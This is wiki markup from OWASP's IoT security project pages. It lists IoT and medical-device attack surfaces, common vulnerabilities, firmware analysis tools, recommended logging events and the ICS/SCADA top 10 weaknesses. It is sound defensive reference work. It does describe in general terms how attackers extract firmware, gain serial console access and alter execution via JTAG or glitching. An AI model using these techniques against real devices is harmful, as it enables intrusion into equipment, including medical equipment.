* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
